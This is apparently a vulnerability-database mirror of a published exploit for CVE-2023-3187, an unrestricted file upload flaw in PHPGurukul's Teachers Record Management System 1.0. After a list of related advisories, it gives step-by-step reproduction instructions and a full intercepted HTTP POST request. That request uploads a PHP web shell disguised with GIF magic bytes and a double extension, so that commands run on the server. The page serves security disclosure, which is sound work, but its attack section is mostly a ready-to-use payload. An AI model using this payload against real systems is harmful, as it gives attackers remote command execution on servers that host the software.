Teachers Record Management System 1.0 Validation Bypass

🗓️ 14 Jun 2023 00:00:00Reported by AFFAN AHMEDType

packetstorm🔗 packetstormsecurity.com👁 310 Views

Teachers Record Management System 1.0 Validation Bypass - File upload type vulnerabilit

Reporter	Title	Published	Views	Family All 10
0day.today	Teachers Record Management System 1.0 - File Upload Type Validation Vulnerability	13 Jun 202300:00	–	zdt
CNNVD	Teachers Record Management System 代码问题漏洞	9 Jun 202300:00	–	cnnvd
CVE	CVE-2023-3187	9 Jun 202321:00	–	cve
Cvelist	CVE-2023-3187 PHPGurukul Teachers Record Management System Profile Picture changeimage.php unrestricted upload	9 Jun 202321:00	–	cvelist
Exploit DB	Teachers Record Management System 1.0 - File Upload Type Validation	13 Jun 202300:00	–	exploitdb
EUVD	EUVD-2023-43868	3 Oct 202520:07	–	euvd
NVD	CVE-2023-3187	9 Jun 202321:15	–	nvd
Prion	Out-of-bounds	9 Jun 202321:15	–	prion
Positive Technologies	PT-2023-23498 · Unknown · Phpgurukul Teachers Record Management System	9 Jun 202300:00	–	ptsecurity
RedhatCVE	CVE-2023-3187	23 May 202502:28	–	redhatcve

`Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation  
Date: 17-01-2023  
EXPLOIT-AUTHOR: AFFAN AHMED  
Vendor Homepage: <https://phpgurukul.com>  
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>  
Version: 1.0  
Tested on: Windows 11 + XAMPP  
CVE : CVE-2023-3187  
  
===============================  
STEPS_TO_REPRODUCE  
===============================  
1. Login into Teacher-Account with the credentials “Username: [email protected]”  
Password: Test@123”  
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image  
3. Open the Burp-suite and Intercept the Edit Image Request  
4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”  
5. Change the **Content-type from “ image/png “ to “ image/gif “  
6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`  
7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**  
8. Below is the Burpsuite-POST Request for all the changes that I have made above  
  
==========================================  
BURPSUITE_REQUEST  
==========================================  
POST /trms/teacher/changeimage.php HTTP/1.1  
Host: localhost  
Content-Length: 442  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: <http://localhost>  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: <http://localhost/trms/teacher/changeimage.php>  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc  
Connection: close  
  
------WebKitFormBoundaryndAPYa0GGOxSUHdF  
Content-Disposition: form-data; name="subjects"  
  
John Doe  
------WebKitFormBoundaryndAPYa0GGOxSUHdF  
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"  
Content-Type: image/gif  
  
GIF89a <?php echo system($_REQUEST['dx']); ?>  
  
------WebKitFormBoundaryndAPYa0GGOxSUHdF  
Content-Disposition: form-data; name="submit"  
  
  
------WebKitFormBoundaryndAPYa0GGOxSUHdF--  
  
  
===============================  
PROOF_OF_CONCEPT  
===============================  
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md  
  
`

14 Jun 2023 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.0057